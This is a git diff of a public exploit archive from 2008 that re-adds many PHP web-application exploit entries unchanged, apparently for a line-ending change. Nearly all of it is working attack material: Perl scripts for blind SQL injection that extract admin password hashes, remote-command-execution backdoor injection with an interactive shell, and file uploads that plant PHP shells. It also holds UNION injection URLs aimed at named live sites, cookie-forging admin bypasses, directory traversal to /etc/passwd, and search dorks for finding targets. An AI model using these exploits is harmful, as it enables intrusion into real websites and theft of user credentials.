+use strict;
+use warnings;
+use LWP::UserAgent;
+use URI::Escape;
+
+my ($request,$send,$ord,$hash,$uid) = (undef,undef,undef,undef,1);
+
+my $host = shift @ARGV or die "[?] Usage: perl $0 http://[host]\n";
+my @chars = (48..57, 97..102); 
+my $http = new LWP::UserAgent;
+
+for(0..32)
+{
+   foreach $ord(@chars) 
+   {
+      $send = " or ascii(substring((select user_password from e107_user where user_id=1),$uid,1))=$ord/*";
+      $send = uri_escape($send);
+    
+      $request = $http->get($host."/e107_plugins/easyshop/easyshop.php?choose_category=1&category_id=-1".$send);
+    
+     if($request->is_success and $request->content !~ /No products available/i)
+     {
+        $hash .= chr($ord); 
+        $uid++;
+     }
+   }
+}
+
+if(defined $hash)
+{
+   print STDOUT "[+] MD5: $hash\n";
+   exit;
+}
+else
+{
+   print STDOUT "[?] Exploit Failed!\n";
+   exit;
+}
+
+# milw0rm.com [2008-10-27]
diff --git a/platforms/php/webapps/6853.txt b/platforms/php/webapps/6853.txt
index 6aa50f6f5..0755b6e7b 100755
--- a/platforms/php/webapps/6853.txt
+++ b/platforms/php/webapps/6853.txt
@@ -1,54 +1,54 @@
---------------------------------------------------------------------------------
-
-Title : Questcms Multiple Remote Vulnerabilities [XSS/Directory Traversal/sql]
-
---------------------------------------------------------------------------------
-#Author: d3b4g
-
-
-#contact: bl4ckend[at]gmail[dot]com
-
---------------------------------------------------------------------------------
-Affected software:
---------------------------------------------------------------------------------
-Application :  Questwork Web Content Management system (QuestCMS)
-URL :  http://www.questwork.com
-
---------------------------------------------------------------------------------
-
-dork        : allinurl:"/questcms/"
---------------------------------------------------------------------------------
-Directory traversal vulnibility
-=============================
-Exploit     : questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html
-
-Live demo   : http://www.questwork.com/questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html
-
-
----------------------------------------------------------------------------------
-
-sql injection:
-==============
-Vuln file:questcms/main/main.php?obj=[sql]
-
-
-XSS:
-====
-exploit:/main/main.php?cx=[Xss]
---------------------------------------------------------------------------------
-
-
-
---------------------------------------------------------------------------------
-
-greetz:
-
-All my friends,milw0rm...
-
---------------------------------------------------------------------------------
-
-
-
---------------------------------- [ www.hotlism.org ] --------------------------------------
-
-# milw0rm.com [2008-10-27]
+--------------------------------------------------------------------------------
+
+Title : Questcms Multiple Remote Vulnerabilities [XSS/Directory Traversal/sql]
+
+--------------------------------------------------------------------------------
+#Author: d3b4g
+
+
+#contact: bl4ckend[at]gmail[dot]com
+
+--------------------------------------------------------------------------------
+Affected software:
+--------------------------------------------------------------------------------
+Application :  Questwork Web Content Management system (QuestCMS)
+URL :  http://www.questwork.com
+
+--------------------------------------------------------------------------------
+
+dork        : allinurl:"/questcms/"
+--------------------------------------------------------------------------------
+Directory traversal vulnibility
+=============================
+Exploit     : questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html
+
+Live demo   : http://www.questwork.com/questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html
+
+
+---------------------------------------------------------------------------------
+
+sql injection:
+==============
+Vuln file:questcms/main/main.php?obj=[sql]
+
+
+XSS:
+====
+exploit:/main/main.php?cx=[Xss]
+--------------------------------------------------------------------------------
+
+
+
+--------------------------------------------------------------------------------
+
+greetz:
+
+All my friends,milw0rm...
+
+--------------------------------------------------------------------------------
+
+
+
+--------------------------------- [ www.hotlism.org ] --------------------------------------
+
+# milw0rm.com [2008-10-27]
diff --git a/platforms/php/webapps/6854.txt b/platforms/php/webapps/6854.txt
index 5cc6b9de5..77dc52958 100755
--- a/platforms/php/webapps/6854.txt
+++ b/platforms/php/webapps/6854.txt
@@ -1,23 +1,23 @@
-###########################################
-# Aiocp 1.4 Remote SQL Injection vulnerability
-#
-# Found by : ExSploiters
-#
-# Contact : exsploiters@gmail.com
-#
-# Download : http://sourceforge.net/project/showfiles.php?group_id=159137&package_id=178594&release_id=619157
-###########################################
-
-PoC :
-
-http://[target]/[path]/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6--
-
-L!ve Demo :
-
-http://demo.opensourcecms.com/aiocp/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6--
-
-Greetz :
-
-no one =)
-
-# milw0rm.com [2008-10-27]
+###########################################
+# Aiocp 1.4 Remote SQL Injection vulnerability
+#
+# Found by : ExSploiters
+#
+# Contact : exsploiters@gmail.com
+#
+# Download : http://sourceforge.net/project/showfiles.php?group_id=159137&package_id=178594&release_id=619157
+###########################################
+
+PoC :
+
+http://[target]/[path]/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6--
+
+L!ve Demo :
+
+http://demo.opensourcecms.com/aiocp/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6--
+
+Greetz :
+
+no one =)
+
+# milw0rm.com [2008-10-27]
diff --git a/platforms/php/webapps/6855.txt b/platforms/php/webapps/6855.txt
index 17c573a3d..cd03d9ecc 100755
--- a/platforms/php/webapps/6855.txt
+++ b/platforms/php/webapps/6855.txt
@@ -1,6 +1,6 @@
-MyKtools 2.4 Arbitrary Database Backup Vulnerability
-By : Mountassif Moad
-Exploit: http://localhost/mykdownload.php
-after you get the page for download the backup
-
-# milw0rm.com [2008-10-27]
+MyKtools 2.4 Arbitrary Database Backup Vulnerability
+By : Mountassif Moad
+Exploit: http://localhost/mykdownload.php
+after you get the page for download the backup
+
+# milw0rm.com [2008-10-27]
diff --git a/platforms/php/webapps/6856.txt b/platforms/php/webapps/6856.txt
index 45092c4e0..d6fd8d981 100755
--- a/platforms/php/webapps/6856.txt
+++ b/platforms/php/webapps/6856.txt
@@ -1,31 +1,31 @@
-e107 Plugin macgurublog_menu macgurublog.php (uid) Remote Sql inj
-
-author: ZoRLu
-
-home: z0rlu.blogspot.com 
-
-concat: trt-turk@hotmail.com
-
-date: 28/10/2008
-
-n0te: YALNIZLIK YiTiRDi ANLAMINI YALNIZLIGIMDA  : ( (
-
-n0te: a.q kpss : ) )
-
-dork: allinurl:"macgurublog.php?uid="
-
-exploit:
-
-http://localhost/script_path/macgurublog.php?uid=[SQL]
-
-[SQL]=
-
--1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*
-
-example:
-
-http://www.dmchat.org.uk/e107_plugins/macgurublog_menu/macgurublog.php?uid=-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*
-
-thanks: str0ke
-
-# milw0rm.com [2008-10-28]
+e107 Plugin macgurublog_menu macgurublog.php (uid) Remote Sql inj
+
+author: ZoRLu
+
+home: z0rlu.blogspot.com 
+
+concat: trt-turk@hotmail.com
+
+date: 28/10/2008
+
+n0te: YALNIZLIK YiTiRDi ANLAMINI YALNIZLIGIMDA  : ( (
+
+n0te: a.q kpss : ) )
+
+dork: allinurl:"macgurublog.php?uid="
+
+exploit:
+
+http://localhost/script_path/macgurublog.php?uid=[SQL]
+
+[SQL]=
+
+-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*
+
+example:
+
+http://www.dmchat.org.uk/e107_plugins/macgurublog_menu/macgurublog.php?uid=-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*
+
+thanks: str0ke
+
+# milw0rm.com [2008-10-28]
diff --git a/platforms/php/webapps/6857.txt b/platforms/php/webapps/6857.txt
index 6bfa654f5..55056616b 100755
--- a/platforms/php/webapps/6857.txt
+++ b/platforms/php/webapps/6857.txt
@@ -1,13 +1,13 @@
-###############################################################################################
-[+] MyForum 1.3 Insecure Cookie Handling Vulnerability
-[+] Discovered By : Mountassif Moad          
-[+] Greetz : All my freind          
-################################################################################################
-Exploit:
-javascript:document.cookie = "myforum_login=1; path=/";
-
-javascript:document.cookie = "myforum_pass=1; path=/";
- 
-desc: if it dont work in the first test try another test 
-
-# milw0rm.com [2008-10-28]
+###############################################################################################
+[+] MyForum 1.3 Insecure Cookie Handling Vulnerability
+[+] Discovered By : Mountassif Moad          
+[+] Greetz : All my freind          
+################################################################################################
+Exploit:
+javascript:document.cookie = "myforum_login=1; path=/";
+
+javascript:document.cookie = "myforum_pass=1; path=/";
+ 
+desc: if it dont work in the first test try another test 
+
+# milw0rm.com [2008-10-28]
diff --git a/platforms/php/webapps/6858.txt b/platforms/php/webapps/6858.txt
index 8bd57ba29..c42e975ed 100755
--- a/platforms/php/webapps/6858.txt
+++ b/platforms/php/webapps/6858.txt
@@ -1,43 +1,43 @@
-|___________________________________________________
-|
-| PersianBB (iranian_music.php id) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|----------------  Hussin X  ------------------
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.IQ-ty.CoM
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|___________________________________________________
-|
-| script :  http://www.persianbb.com/
-|
-| DorK   : Powered By :  PersianBB.com
-|___________________________________________________
-
-Exploit:
-________
-
-
-www.[target].com/Script/iranian_music.php?id=-1+union+select+1,concat_ws(0x3a,user,psw),3,4,5,6,7+from+prelude--
-
-
-Demo:
-________
-
-http://persiandel.com/iranian_music.php?id=-1+union+select+1,concat_ws(0x3a,user,psw),3,4,5,6,7+from+prelude--
-
-
-
-________________( Greetz )_____________________
- _____   ____   __   __     _       ____
-|_   _| |  _ \  \ \ / /    / \     / ___|
-  | |   | |_) |  \ V /    / _ \   | |  _
-  | |   |  _ <    | |    / ___ \  | |_| |
-  |_|   |_| \_\   |_|   /_/   \_\  \____|
-_______________________________________________
-
-# milw0rm.com [2008-10-28]
+|___________________________________________________
+|
+| PersianBB (iranian_music.php id) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|----------------  Hussin X  ------------------
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.IQ-ty.CoM
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|___________________________________________________
+|
+| script :  http://www.persianbb.com/
+|
+| DorK   : Powered By :  PersianBB.com
+|___________________________________________________
+
+Exploit:
+________
+
+
+www.[target].com/Script/iranian_music.php?id=-1+union+select+1,concat_ws(0x3a,user,psw),3,4,5,6,7+from+prelude--
+
+
+Demo:
+________
+
+http://persiandel.com/iranian_music.php?id=-1+union+select+1,concat_ws(0x3a,user,psw),3,4,5,6,7+from+prelude--
+
+
+
+________________( Greetz )_____________________
+ _____   ____   __   __     _       ____
+|_   _| |  _ \  \ \ / /    / \     / ___|
+  | |   | |_) |  \ V /    / _ \   | |  _
+  | |   |  _ <    | |    / ___ \  | |_| |
+  |_|   |_| \_\   |_|   /_/   \_\  \____|
+_______________________________________________
+
+# milw0rm.com [2008-10-28]
diff --git a/platforms/php/webapps/6859.txt b/platforms/php/webapps/6859.txt
index 572f7e585..678c1bc5c 100755
--- a/platforms/php/webapps/6859.txt
+++ b/platforms/php/webapps/6859.txt
@@ -1,34 +1,34 @@
-**************************************************************************************
-
-Author : DaRkLiFe
-Greetz : str0ke & S.W.A.T. & funkys0ul & Team 1nF3Ct3d
-
-**************************************************************************************
-Script   :
-
-ThemeSiteScript v1.0 Remote File Inclusion Vulnerability
-
-Home Page :
-
-http://agaresmedia.com
-
-Download :
-
-http://rapidshare.com/files/72501220/ThemeSiteScript_1.0_webgraf.ru.rar
-
-**************************************************************************************
-
-Exploit :
-
-http://localhost/upload/admin/frontpage_right.php?loadadminpage=Sh3lLz?
-
-**************************************************************************************
-
-Vulnerable : line 2 : 
-
-**************************************************************************************
-
-THANKS ! GREETZ ! HAPPY DIWALI !
-**************************************************************************************
-
-# milw0rm.com [2008-10-28]
+**************************************************************************************
+
+Author : DaRkLiFe
+Greetz : str0ke & S.W.A.T. & funkys0ul & Team 1nF3Ct3d
+
+**************************************************************************************
+Script   :
+
+ThemeSiteScript v1.0 Remote File Inclusion Vulnerability
+
+Home Page :
+
+http://agaresmedia.com
+
+Download :
+
+http://rapidshare.com/files/72501220/ThemeSiteScript_1.0_webgraf.ru.rar
+
+**************************************************************************************
+
+Exploit :
+
+http://localhost/upload/admin/frontpage_right.php?loadadminpage=Sh3lLz?
+
+**************************************************************************************
+
+Vulnerable : line 2 : 
+
+**************************************************************************************
+
+THANKS ! GREETZ ! HAPPY DIWALI !
+**************************************************************************************
+
+# milw0rm.com [2008-10-28]
diff --git a/platforms/php/webapps/6860.txt b/platforms/php/webapps/6860.txt
index 32c3ecd15..eefa5a59d 100755
--- a/platforms/php/webapps/6860.txt
+++ b/platforms/php/webapps/6860.txt
@@ -1,20 +1,20 @@
--========================================-
-Autore: x0r
-Email: evolutionteam.x0 [at] gmail.com
-Cms: TlGuestBook v 1.2
-Bug: Insecure Cookie Handling Vulnerability
-Cms Download: http://www.easy-script.com/scripts-dl/tlguestb-12.zip
--========================================-
-
-Exploit:
-
-javascript:document.cookie = "tlGuestBook_login=admin; path=/"
-
-Greetz to: Alla mia Bimb4...Margherita ti amo...E Anche A Quel Frocio Di
-Andrea ( HaveStyle), str0ke :P
-
-^^'' p0wn3d Beby.
-
--=EOF=-
-
-# milw0rm.com [2008-10-28]
+-========================================-
+Autore: x0r
+Email: evolutionteam.x0 [at] gmail.com
+Cms: TlGuestBook v 1.2
+Bug: Insecure Cookie Handling Vulnerability
+Cms Download: http://www.easy-script.com/scripts-dl/tlguestb-12.zip
+-========================================-
+
+Exploit:
+
+javascript:document.cookie = "tlGuestBook_login=admin; path=/"
+
+Greetz to: Alla mia Bimb4...Margherita ti amo...E Anche A Quel Frocio Di
+Andrea ( HaveStyle), str0ke :P
+
+^^'' p0wn3d Beby.
+
+-=EOF=-
+
+# milw0rm.com [2008-10-28]
diff --git a/platforms/php/webapps/6861.pl b/platforms/php/webapps/6861.pl
index a5cd7570e..eb983d761 100755
--- a/platforms/php/webapps/6861.pl
+++ b/platforms/php/webapps/6861.pl
@@ -1,69 +1,69 @@
-#!/usr/bin/perl 
-# ---------------------------------------------------------- 
-# H2O-CMS <= 3.4 Remote Command Execution Exploit (mq = Off)
-# Discovered By StAkeR[at]hotmail[dot]it
-# Download On http://sourceforge.net/projects/h2o-cms
-# ---------------------------------------------------------- 
-
-use strict;
-use LWP::UserAgent;
-use LWP::Simple;
-
-my $post;
-my $sysc;
-my $host = shift or athos();
-my $auth = "user=admin&id=1&admin=1";
-my $http = new LWP::UserAgent;
-
-my $write = {
-              'site_title'  => '";""; error_reporting(0); echo"//athos"; "',
-              'db_server'   => '";""; include($_REQUEST["i"]); "',
-              'db_name'     => '";""; eval($_REQUEST["g"]); "',
-              'db_username' => '";""; echo shell_exec($_REQUEST["c"]); "',
-              'db_password' => '";""; echo system($_REQUEST["s"]); "',
-              'save'        => 'Save',
-            };
-
-
-$http->default_header('Cookie' => $auth);
-$post = $http->post($host.'/index.php?option=SaveConfig',$write);
-
-    
-sub start_exec
-{  
-   my $site = shift @_;
-   my $exec = shift @_;
-   my $view = get($site.'/includes/config.php?c='.$exec);
-   
-   return $view;
-}   
-
-sub athos
-{
-   print STDOUT "# Usage: perl $0 http://[host]\n";
-   print STDOUT "# Remote Command Execution Exploit\n";
-   exit;
-}
-
-unless(get($host) =~ /\/\/athos/i)
-{
-   print STDOUT "# Exploit Failed!\n";
-   exit;
-}
-else
-{
-  while(1)
-  {
-     if(defined start_exec($host,$sysc))
-     {
-        print STDOUT "[athos-shell] ~# "; 
-        chomp($sysc = );
-      
-        print STDOUT "[athos-shell] ~# ".start_exec($host,$sysc)."\n";
-     }             
-  }
-}
-
-__END__
-
-# milw0rm.com [2008-10-28]
+#!/usr/bin/perl 
+# ---------------------------------------------------------- 
+# H2O-CMS <= 3.4 Remote Command Execution Exploit (mq = Off)
+# Discovered By StAkeR[at]hotmail[dot]it
+# Download On http://sourceforge.net/projects/h2o-cms
+# ---------------------------------------------------------- 
+
+use strict;
+use LWP::UserAgent;
+use LWP::Simple;
+
+my $post;
+my $sysc;
+my $host = shift or athos();
+my $auth = "user=admin&id=1&admin=1";
+my $http = new LWP::UserAgent;
+
+my $write = {
+              'site_title'  => '";""; error_reporting(0); echo"//athos"; "',
+              'db_server'   => '";""; include($_REQUEST["i"]); "',
+              'db_name'     => '";""; eval($_REQUEST["g"]); "',
+              'db_username' => '";""; echo shell_exec($_REQUEST["c"]); "',
+              'db_password' => '";""; echo system($_REQUEST["s"]); "',
+              'save'        => 'Save',
+            };
+
+
+$http->default_header('Cookie' => $auth);
+$post = $http->post($host.'/index.php?option=SaveConfig',$write);
+
+    
+sub start_exec
+{  
+   my $site = shift @_;
+   my $exec = shift @_;
+   my $view = get($site.'/includes/config.php?c='.$exec);
+   
+   return $view;
+}   
+
+sub athos
+{
+   print STDOUT "# Usage: perl $0 http://[host]\n";
+   print STDOUT "# Remote Command Execution Exploit\n";
+   exit;
+}
+
+unless(get($host) =~ /\/\/athos/i)
+{
+   print STDOUT "# Exploit Failed!\n";
+   exit;
+}
+else
+{
+  while(1)
+  {
+     if(defined start_exec($host,$sysc))
+     {
+        print STDOUT "[athos-shell] ~# "; 
+        chomp($sysc = );
+      
+        print STDOUT "[athos-shell] ~# ".start_exec($host,$sysc)."\n";
+     }             
+  }
+}
+
+__END__
+
+# milw0rm.com [2008-10-28]
diff --git a/platforms/php/webapps/6862.txt b/platforms/php/webapps/6862.txt
index a7d984dde..5bbcc6c76 100755
--- a/platforms/php/webapps/6862.txt
+++ b/platforms/php/webapps/6862.txt
@@ -1,10 +1,10 @@
-# ----------------------------------------------------------
-# H2O-CMS <= 3.4 Insecure Cookie Handling Vulnerability
-# Discovered By Mountassif Moad
-# Download On http://sourceforge.net/projects/h2o-cms
-# Home World http://v4-team.com
-# ----------------------------------------------------------
-Exploit:
-javascript:document.cookie = "admin=1; path=/";
-
-# milw0rm.com [2008-10-29]
+# ----------------------------------------------------------
+# H2O-CMS <= 3.4 Insecure Cookie Handling Vulnerability
+# Discovered By Mountassif Moad
+# Download On http://sourceforge.net/projects/h2o-cms
+# Home World http://v4-team.com
+# ----------------------------------------------------------
+Exploit:
+javascript:document.cookie = "admin=1; path=/";
+
+# milw0rm.com [2008-10-29]
diff --git a/platforms/php/webapps/6866.pl b/platforms/php/webapps/6866.pl
index 3540103a6..8eacb7da4 100755
--- a/platforms/php/webapps/6866.pl
+++ b/platforms/php/webapps/6866.pl
@@ -1,52 +1,52 @@
-#!/usr/bin/perl
-
-use warnings;
-use strict;
-use LWP::UserAgent;
-use HTTP::Request::Common;
-
-my $fname = rand(1000) . ".php"; # int.. yes i know PU!
-
-print < Spoofing            +
-+         Discovered && Coded By: t0pP8uZz          +
-+                                                   +
-+        Contact IRC: irc.rizon.net #sectalk        +
-+ Vendor not notified! Later versions maybe vuln!   +
-+                                                   +
-+   Discovered On: 25 October 2008 / milw0rm.com    +
-+                                                   +
-+          Script Download: http://7shop.de         +
-+++++++++++++++++++++++++++++++++++++++++++++++++++++
-INTRO
-
-print "\nEnter URL(ie: http://site.com/shop): ";
-    chomp(my $url=);
-    
-print "\nEnter File Path(path to local file to upload): ";
-    chomp(my $file=);
-
-my $ua = LWP::UserAgent->new;
-my $re = $ua->request(POST $url.'/includes/imageupload.php',
-                      Content_Type => 'form-data',
-                      Content      => [ img1 => [ $file, $fname, Content_Type => 'image/jpeg' ], ] );
-
-die "HTTP POST Failed!" unless $re->is_success;
-
-if($re->content =~ /File is valid/) {
-    
-    print "File successfully uploaded! Access your file here: " . $url . "/images/artikel/" . $fname . "\n"; # say()? nah you havent got perl510 yet. have you!
-}
-elsif($re->content =~ /The requested URL/) { # apache debug only
-    
-    print "File Upload Failed! The requested target was not running a vulnerable version of 7shop!\n";
-}
-else {
-    
-    print "File Upload Failed! target vulnerable, but upload failed.. try changing filename.\n";
-}
-exit;
-
-# milw0rm.com [2008-10-29]
+#!/usr/bin/perl
+
+use warnings;
+use strict;
+use LWP::UserAgent;
+use HTTP::Request::Common;
+
+my $fname = rand(1000) . ".php"; # int.. yes i know PU!
+
+print < Spoofing            +
++         Discovered && Coded By: t0pP8uZz          +
++                                                   +
++        Contact IRC: irc.rizon.net #sectalk        +
++ Vendor not notified! Later versions maybe vuln!   +
++                                                   +
++   Discovered On: 25 October 2008 / milw0rm.com    +
++                                                   +
++          Script Download: http://7shop.de         +
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+INTRO
+
+print "\nEnter URL(ie: http://site.com/shop): ";
+    chomp(my $url=);
+    
+print "\nEnter File Path(path to local file to upload): ";
+    chomp(my $file=);
+
+my $ua = LWP::UserAgent->new;
+my $re = $ua->request(POST $url.'/includes/imageupload.php',
+                      Content_Type => 'form-data',
+                      Content      => [ img1 => [ $file, $fname, Content_Type => 'image/jpeg' ], ] );
+
+die "HTTP POST Failed!" unless $re->is_success;
+
+if($re->content =~ /File is valid/) {
+    
+    print "File successfully uploaded! Access your file here: " . $url . "/images/artikel/" . $fname . "\n"; # say()? nah you havent got perl510 yet. have you!
+}
+elsif($re->content =~ /The requested URL/) { # apache debug only
+    
+    print "File Upload Failed! The requested target was not running a vulnerable version of 7shop!\n";
+}
+else {
+    
+    print "File Upload Failed! target vulnerable, but upload failed.. try changing filename.\n";
+}
+exit;
+
+# milw0rm.com [2008-10-29]
diff --git a/platforms/php/webapps/6867.pl b/platforms/php/webapps/6867.pl
index 474a49fa3..20171b7b6 100755
--- a/platforms/php/webapps/6867.pl
+++ b/platforms/php/webapps/6867.pl
@@ -1,58 +1,58 @@
-#!/usr/bin/perl
-
-use warnings;
-use strict;
-use LWP::UserAgent;
-use HTTP::Request::Common;
-
-my $fname = rand(99999) . ".php"; # no int()
-
-print <);
-    
-print "\nEnter File Path(path to local file to upload): ";
-    chomp(my $file=);
-    
-my $ua = LWP::UserAgent->new;
-my $re = $ua->request(POST $url . '/wp-content/plugins/wp-shopping-cart/image_processing.php',
-                      Content_Type => 'form-data',
-                      Content      => [ Submit => "Add", image => [ $file, $fname, Content_Type => 'plain/text' ], ] );
-
-die "Exploit Failed: HTTP POST Failed!" unless $re->is_success;
-
-if($re->content =~ /Fatal error/i) { 
-    print "Complete! To see if exploit was successfull visit the following URL for your uploaded file.\n";
-    print "Uploaded File: " . $url . "/wp-content/plugins/wp-shopping-cart/" . $fname . "\n";
-} else
-{
-    print "Exploit Failed! Target host not vulnerable!\n";
-}
-exit;
-
-# milw0rm.com [2008-10-29]
+#!/usr/bin/perl
+
+use warnings;
+use strict;
+use LWP::UserAgent;
+use HTTP::Request::Common;
+
+my $fname = rand(99999) . ".php"; # no int()
+
+print <);
+    
+print "\nEnter File Path(path to local file to upload): ";
+    chomp(my $file=);
+    
+my $ua = LWP::UserAgent->new;
+my $re = $ua->request(POST $url . '/wp-content/plugins/wp-shopping-cart/image_processing.php',
+                      Content_Type => 'form-data',
+                      Content      => [ Submit => "Add", image => [ $file, $fname, Content_Type => 'plain/text' ], ] );
+
+die "Exploit Failed: HTTP POST Failed!" unless $re->is_success;
+
+if($re->content =~ /Fatal error/i) { 
+    print "Complete! To see if exploit was successfull visit the following URL for your uploaded file.\n";
+    print "Uploaded File: " . $url . "/wp-content/plugins/wp-shopping-cart/" . $fname . "\n";
+} else
+{
+    print "Exploit Failed! Target host not vulnerable!\n";
+}
+exit;
+
+# milw0rm.com [2008-10-29]
diff --git a/platforms/php/webapps/6868.pl b/platforms/php/webapps/6868.pl
index c19b92501..f9156aab8 100755
--- a/platforms/php/webapps/6868.pl
+++ b/platforms/php/webapps/6868.pl
@@ -1,66 +1,66 @@
-#!/usr/bin/perl
-
-use warnings;
-use strict;
-use LWP::UserAgent;
-use HTTP::Request::Common;
-
-my $fname = rand(99999) . ".php"; # no int()
-
-print <);
-    
-print "\nEnter File Path(path to local file to upload): ";
-    chomp(my $file=);
-
-my $ua = LWP::UserAgent->new;
-my $re = $ua->request(POST $url.'/components/com_simpleboard/image_upload.php',
-                      Content_Type => 'form-data',
-                      Content      => [ attachimage => [ $file, $fname, Content_Type => 'image/jpeg' ], ] );
-
-die "HTTP POST Failed!" unless $re->is_success;
-
-if($re->content =~ /open_basedir/) {
-    
-    print "open_basedir restriction enabled. Exploit failed. See php.ini for more details.\n"; # say() ? get perl510
-}
-else {
- 
-    print "Looks like exploit was successfull! for uploaded file check:  " . $url . "/components/com_simpleboard/" . $fname . "\n";   
-}
-exit;
-
-# milw0rm.com [2008-10-29]
+#!/usr/bin/perl
+
+use warnings;
+use strict;
+use LWP::UserAgent;
+use HTTP::Request::Common;
+
+my $fname = rand(99999) . ".php"; # no int()
+
+print <);
+    
+print "\nEnter File Path(path to local file to upload): ";
+    chomp(my $file=);
+
+my $ua = LWP::UserAgent->new;
+my $re = $ua->request(POST $url.'/components/com_simpleboard/image_upload.php',
+                      Content_Type => 'form-data',
+                      Content      => [ attachimage => [ $file, $fname, Content_Type => 'image/jpeg' ], ] );
+
+die "HTTP POST Failed!" unless $re->is_success;
+
+if($re->content =~ /open_basedir/) {
+    
+    print "open_basedir restriction enabled. Exploit failed. See php.ini for more details.\n"; # say() ? get perl510
+}
+else {
+ 
+    print "Looks like exploit was successfull! for uploaded file check:  " . $url . "/components/com_simpleboard/" . $fname . "\n";   
+}
+exit;
+
+# milw0rm.com [2008-10-29]
diff --git a/platforms/php/webapps/6869.txt b/platforms/php/webapps/6869.txt
index c9c1196b7..80fe83666 100755
--- a/platforms/php/webapps/6869.txt
+++ b/platforms/php/webapps/6869.txt
@@ -1,73 +1,73 @@
--[*]+================================================================================+[*]-
--[*]+		    WebCards <= 1.3 Remote SQL Injection Vulnerability	             +[*]-
--[*]+================================================================================+[*]-
-
-
-
-[*] Discovered By: t0pP8uZz
-[*] Contact: irc.rizon.net #sectalk
-[*] Discovered On: 22 October 2008
-[*] Script Download: http://www.mywebcards.net/
-[*] DORK: "Powered By Webcards"
-
-
-
-[*] Vendor Has Not Been Notified!
-
-
-
-[*] DESCRIPTION/USAGE: 
-
-	WebCards 1.3 and prior versions suffer from a MySQL injection in the admin login
-	page, This allows remote attackers to gain access to the administration area
-	without having a valid user/pass combination.
-
-	All what is needed is the valid username, The default admin username is "admin" so
-	the below SQL syntax should gain entry to a vulnerable site.
-
-	Not all sites are vulnerable, It relys on Magic Quotes, and other script settings for
-	this to work, I tested on about 15 sites, and 2 of those 15 were only vulnerable.
-
-	Once in the administration area its possible to get a very easy shell, Which is
-	explained in the "Notes" section of this document.
-
-
-
-[*] SQL Injection:
-
-	First find a vulnerable site, Then goto http://site.com/webcards/admin.php
-
-	Enter the following in the username textbox: admin" and ""="
-	Enter the following in the password textbox: 1
-
-
-
-[*] NOTE/TIP: 
-
-	To gain a shell on the vulnerable host, Simply use the sql injection above, Once
-	administration is gained, Click "Add Image Macro" follow the onscreen instructions
-	and change the extension to php or what ever file type you want.
-
-	Once complete goto "Images" and upload your shell/file, When its complete, Navigate
-	back to images, Goto "Show All" and look for your file name, then just copy the LINK.
-
-
-[*] GREETZ: 
-
-	milw0rm.com, Offensive-Security.com, CipherCrew !
-
-
-
-[-] Come hang in irc, irc.rizon.net #sectalk
-	
-	Peace...
-
-	...t0pP8uZz !
-
-
-
--[*]+================================================================================+[*]-
--[*]+		    WebCards <= 1.3 Remote SQL Injection Vulnerability	             +[*]-
--[*]+================================================================================+[*]-
-
-# milw0rm.com [2008-10-29]
+-[*]+================================================================================+[*]-
+-[*]+		    WebCards <= 1.3 Remote SQL Injection Vulnerability	             +[*]-
+-[*]+================================================================================+[*]-
+
+
+
+[*] Discovered By: t0pP8uZz
+[*] Contact: irc.rizon.net #sectalk
+[*] Discovered On: 22 October 2008
+[*] Script Download: http://www.mywebcards.net/
+[*] DORK: "Powered By Webcards"
+
+
+
+[*] Vendor Has Not Been Notified!
+
+
+
+[*] DESCRIPTION/USAGE: 
+
+	WebCards 1.3 and prior versions suffer from a MySQL injection in the admin login
+	page, This allows remote attackers to gain access to the administration area
+	without having a valid user/pass combination.
+
+	All what is needed is the valid username, The default admin username is "admin" so
+	the below SQL syntax should gain entry to a vulnerable site.
+
+	Not all sites are vulnerable, It relys on Magic Quotes, and other script settings for
+	this to work, I tested on about 15 sites, and 2 of those 15 were only vulnerable.
+
+	Once in the administration area its possible to get a very easy shell, Which is
+	explained in the "Notes" section of this document.
+
+
+
+[*] SQL Injection:
+
+	First find a vulnerable site, Then goto http://site.com/webcards/admin.php
+
+	Enter the following in the username textbox: admin" and ""="
+	Enter the following in the password textbox: 1
+
+
+
+[*] NOTE/TIP: 
+
+	To gain a shell on the vulnerable host, Simply use the sql injection above, Once
+	administration is gained, Click "Add Image Macro" follow the onscreen instructions
+	and change the extension to php or what ever file type you want.
+
+	Once complete goto "Images" and upload your shell/file, When its complete, Navigate
+	back to images, Goto "Show All" and look for your file name, then just copy the LINK.
+
+
+[*] GREETZ: 
+
+	milw0rm.com, Offensive-Security.com, CipherCrew !
+
+
+
+[-] Come hang in irc, irc.rizon.net #sectalk
+	
+	Peace...
+
+	...t0pP8uZz !
+
+
+
+-[*]+================================================================================+[*]-
+-[*]+		    WebCards <= 1.3 Remote SQL Injection Vulnerability	             +[*]-
+-[*]+================================================================================+[*]-
+
+# milw0rm.com [2008-10-29]
diff --git a/platforms/php/webapps/6874.txt b/platforms/php/webapps/6874.txt
index 6768591f6..e88b4c28f 100755
--- a/platforms/php/webapps/6874.txt
+++ b/platforms/php/webapps/6874.txt
@@ -1,54 +1,54 @@
-################################################################ 
-#       .___             __          _______       .___        # 
-#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
-#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
-#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
-#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
-#        \/                  \/             \/                 # 
